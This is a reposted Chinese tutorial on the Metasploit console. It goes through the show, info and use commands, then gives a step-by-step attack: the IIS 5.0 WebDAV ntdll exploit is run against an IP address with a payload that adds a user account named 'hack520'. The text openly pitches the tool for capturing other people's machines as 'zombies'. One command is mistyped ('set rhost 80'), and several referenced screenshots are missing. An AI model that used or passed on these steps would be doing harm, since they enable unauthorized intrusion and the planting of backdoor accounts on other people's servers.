強大溢出工具包：Metasploit命令列下的使用 （轉至77169）

Metasploit 是個好東西，實在想不到別的辦法了，或許這東西能幫你一下，Metasploit包含了眾多exploit，說不準還能用上幾個，搞幾台好肉雞.

下載Metasploit雙擊進行安裝，非常簡單，一路斷行符號就行了。安裝完之後看下安裝目錄下的Msfconsole.bat和msfweb.bat,第一個是命令下的控制台。第二個是圖形介面下的程式。現在我們先來看下命令列下的使用方法,運行後我們看到的是metasploit的歡迎介面，輸入“？”查看協助，1

 

看到很多命令吧，我們來解釋一下

“？” 協助
“cd” :這個命令大家都熟悉，和WIN下面一樣，切換目錄
“exit” 這個就是退出的意思
“info”顯示當前程式資訊
“quit”退出程式
“reload”載入exploit和payloads
“save”儲存設定
“setg”設定一個環境變數
“show”顯示當前可用的exploit
“ use”選擇一個exp
“version”顯示程式版本
這麼多命令看起來肯定有些暈了吧其實用到的就"show" "info" "use"這3個，我們來看看是怎麼使用的

這個程式就是一個大的工具包，整合了N多EXPLOIT,我們可以用show exploits看看有哪些exploit程式,2

Return to Gallery | Original Image

 

看到了吧？這麼多溢出程式，想用哪個就用哪個，省得整天找。這麼多的東西該怎麼用呢？？比如我想用一個溢出程式，肯定得先看他的協助瞭解使用方法。這就得用到info命令啦。這個命令就是顯示溢出程式的詳細資料，比如我們想看下iis50_webdav_ntdll這個溢出程式的用法,就在命令列下輸入info exploit iis50_webdav_ntdll,就會看到圖3所示

 

這裡只是查看Exploit的資訊，我們還可查看shellcode的資訊。在這個工具包中，可以定義自己需要的shellcode.在命令列下輸入"show payloads"可以看到可用的shellcode列表，4

 

左邊是名字，右邊是說明。我們可以用info命令查看shellcode的具體資訊，輸入命令info payload  cmd_generic5所示

 

這裡要注意的只是required和options,這裡required表示必選 options 表示可選可不選，以linux開頭的就是針對linux系統的shellcode，以CMD和WIN開頭的就是針對所有WIN系統。在溢出過程中一定要選對應的SHELLCODE才能成功。

好，現在我們來看實戰一下，我們拿webdav的溢出程式做例子,在命令中輸入use iis50_webdav_ntdll,然後再輸入show options 查看要輸入的內容,6所示

 

然後我們在命令列下輸入set rhost 192.168.1.223 set rhost 80 7所示

 
 

到這裡了，得指定shellcode，輸入以下命令：set payload winexec輸完了按斷行符號然後再輸入set cmd net user hack520 /add  8所示

 

好了現在可以向192.168.1.223發起進攻了，輸入show targets 可以看到作業系統的代號，大家都知道webdav走針對2000系統，輸入 set targets 0 9所示

 

沒有什麼問題了就輸入Exploit。如果對方伺服器存在這個漏洞話就會得到shell了

http://www.metasploit.com/projects/Framework/downloads.html